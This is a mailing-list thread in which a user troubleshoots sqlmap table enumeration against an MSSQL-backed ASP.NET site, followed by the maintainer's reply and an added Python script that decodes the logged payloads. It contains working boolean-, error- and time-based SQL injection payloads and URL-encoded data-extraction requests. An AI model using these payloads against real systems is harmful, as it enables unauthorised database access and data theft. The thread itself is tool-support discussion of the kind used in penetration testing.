Hi.

Maybe the web server has a threshold value for parameter value length. This
looks like such a case.

Kind regards,
Miroslav Stampar
On 22.2.2013. 02:23 "Brian Milliron" <br...@ecrsecurity.com> wrote:

> sqlmap is able to extract db names, current user and backend info, but
> when I try to get tables I end up with junk data or nothing at all.  I
> find this strange because SQLmap has identified multiple injection
> methods and I am on a fast local connection with the target server.
> This is the log file with examples of good/bad data.
>
> sqlmap identified the following injection points with a total of 118915
> HTTP(s) requests:
> ---
> Place: POST
> Parameter: accountNumber
>      Type: boolean-based blind
>      Title: Generic boolean-based blind - Parameter replace (original
> value)
>      Payload: accountNumber=(SELECT (CASE WHEN (4906=4906) THEN 1111111
> ELSE 1/(SELECT 0)
> END))&meterNumber=1111111&zipCode=78451&email=t...@test.com
> &register=Register
>
>      Type: error-based
>      Title: Microsoft SQL Server/Sybase error-based - Parameter replace
>      Payload:
>
> accountNumber=(CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(109)+CHAR(100)+CHAR(58)+(SELECT
> (CASE WHEN (3149=3149) THEN CHAR(49) ELSE CHAR(48)
>
> END))+CHAR(58)+CHAR(100)+CHAR(111)+CHAR(103)+CHAR(58))))&meterNumber=1111111&zipCode=78451&email=
> t...@test.com&register=Register
>
>      Type: AND/OR time-based blind
>      Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
>      Payload: accountNumber=-9196 OR 8333=(SELECT COUNT(*) FROM sysusers
> AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS
> sys5,sysusers AS sys6,sysusers AS
> sys7)&meterNumber=1111111&zipCode=78451&email=t...@test.com
> &register=Register
> ---
> web server operating system: Windows 2003
> web application technology: ASP.NET, Microsoft IIS 6.0
> back-end DBMS: Microsoft SQL Server 2008
> available databases [21]:
> [redacted]
> current user:    [redacted]
> current database:    [redacted]
> current user is DBA:    False
>
> [6 tables]
>
> +------------------------------------------------------------------------------------------------------------------------
> | dbo.[??4c0?4A00370?520?22??2d0040005a??00??2A??58??5f0?0d00000?3c??2
> |
> |dbo.[\n\n]
> |
> |dbo.[\n\n]
> |
> dbo.[\n\n]
>
> dbo.[\n\n]
>
> +------------------------------------------------------------------------------------------------------------------------
>
> When I use --no-cast and --hex flags I get no data at all and when I
> don't use them I get junk data.  When I look at the raw request/response
> in every case I see sqlmap send a test request with no injection which
> generates a 200 response, then follows an attempt to read the number of
> tables which generates a 500 error with a number in the error message.
> Every follow-on request generates a 200 OK response, which means that
> neither boolean nor error based methods are working and it falls back to
> time based which then also fails.  Of all the correct data gathered so
> far, all was through error messages.  However, specifying --technique=E
> --parse-errors does not gain any additional info.  Some selected
> examples from the logs related to this attempt follow:
>
>
> ./sqlmap.py -r /root/request --fresh-queries -o --hex --no-cast -D
> master --tables -t ~/sqlmap
>
> [WARNING] it was not possible to count the number of entries for the SQL
> query provided. sqlmap will assume that it returns only one entry
> [WARNING] in case of continuous data retrieval problems you are advised
> to try a switch '--no-cast' and/or switch '--hex'
> [CRITICAL] unable to retrieve the tables for any database
> [WARNING] HTTP error codes detected during run:
> 500 (Internal Server Error) - 18 times
>
>
> %28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28100%29%2BCHAR%2858%29%2B%28SELECT%20master.sys.fn_varbintohexstr%28CAST%28COUNT%28master..
> sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name
> %29%20AS%20VARBINARY%28MAX%29%29%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%29%2BCHAR%2858%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2858%29%29%29%29
>
> HTTP response [#2] (500 Internal Server Error):
> [Macromedia][SQLServer JDBC Driver][SQLServer]Conversion failed when
> converting the nvarchar value ':omd:0x00000167:dog:' to data type int.
>
>
> %28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28100%29%2BCHAR%2858%29%2B%28SELECT%20TOP%201%20SUBSTRING%28%28master.sys.fn_varbintohexstr%28CAST%28master..
> sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name
> %20AS%20VARBINARY%28MAX%29%29%29%29%2C1%2C100%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%20AND%20master.sys.fn_varbintohexstr%28CAST%28master..
> sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name
> %20AS%20VARBINARY%28MAX%29%29%29%20NOT%20IN%20%28SELECT%20TOP%200%20master.sys.fn_varbintohexstr%28CAST%28master..
> sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name
> %20AS%20VARBINARY%28MAX%29%29%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%20ORDE
> R%20BY%20master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name
> %29%20ORDER%20BY%20master..sysusers.name%2BCHAR%2846%29%2Bmaster..
> sysobjects.name
> %29%2BCHAR%2858%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2858%29%29%29%29
>
> HTTP response [#3] (200 OK):
>
>
> ------------------------------------------------------------------------------
> Everyone hates slow websites. So do we.
> Make your web apps faster with AppDynamics
> Download AppDynamics Lite for free today:
> http://p.sf.net/sfu/appdyn_d2d_feb
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
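A small triage script, added here as an example and not part of the thread or of sqlmap, that applies Miroslav's hypothesis to the two request/response pairs quoted above: it decodes each payload, pulls the value back out of the ':omd:' / ':dog:' delimiters that sqlmap wrapped around it, and reports the longest payload the server still executed against the shortest one that came back 200 with no marker. The two log entries are copied from the quoted mail with its line wraps removed; the marker parsing assumes the CHAR(58)-based delimiters visible in the log.

```python
import re
from urllib.parse import unquote

# Request/response pairs copied from the quoted log (mail line wraps removed).
LOG = [
    {"status": 500,
     "payload": ("%28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28100%29%2BCHAR%2858%29%2B%28SELECT%20master.sys.fn_varbintohexstr%28CAST%28COUNT%28master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name"
                 "%29%20AS%20VARBINARY%28MAX%29%29%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%29%2BCHAR%2858%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2858%29%29%29%29"),
     "body": "[Macromedia][SQLServer JDBC Driver][SQLServer]Conversion failed when "
             "converting the nvarchar value ':omd:0x00000167:dog:' to data type int."},
    {"status": 200,
     "payload": ("%28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28100%29%2BCHAR%2858%29%2B%28SELECT%20TOP%201%20SUBSTRING%28%28master.sys.fn_varbintohexstr%28CAST%28master.."
                 "sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%20AS%20VARBINARY%28MAX%29%29%29%29%2C1%2C100%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%20AND%20master.sys.fn_varbintohexstr%28CAST%28master.."
                 "sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%20AS%20VARBINARY%28MAX%29%29%29%20NOT%20IN%20%28SELECT%20TOP%200%20master.sys.fn_varbintohexstr%28CAST%28master.."
                 "sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%20AS%20VARBINARY%28MAX%29%29%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%20ORDE"
                 "R%20BY%20master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%29%20ORDER%20BY%20master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%29%2BCHAR%2858%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2858%29%29%29%29"),
     "body": ""},  # empty 200 OK: the injected query never ran, so no marker came back
]

# Delimiters seen in the log: CHAR(58)+'omd'+CHAR(58) ... CHAR(58)+'dog'+CHAR(58)
MARKER = re.compile(r":omd:([^:]*):dog:")


def decode_payload(encoded):
    """Undo the URL encoding so the injected SQL can be read and measured."""
    return unquote(encoded)


def extract_marker(body):
    """Value sqlmap wrapped in its delimiters; hex output of fn_varbintohexstr
    becomes an int. None when the response carries no marker at all."""
    m = MARKER.search(body)
    if not m:
        return None
    value = m.group(1)
    return int(value, 16) if value.lower().startswith("0x") else value


def length_bounds(log):
    """Longest decoded payload the server still executed (marker came back) and
    shortest one answered without a marker. A clear gap between the two is what
    a server-side limit on parameter value length would look like."""
    lengths = [(len(decode_payload(e["payload"])), extract_marker(e["body"])) for e in log]
    executed = [n for n, marker in lengths if marker is not None]
    dropped = [n for n, marker in lengths if marker is None]
    return max(executed), min(dropped)
```

Run `length_bounds(LOG)` on a fuller capture to see whether every silent 200 sits above every answered request; if it does, the fix is on the sqlmap side (shorter queries), not a retry.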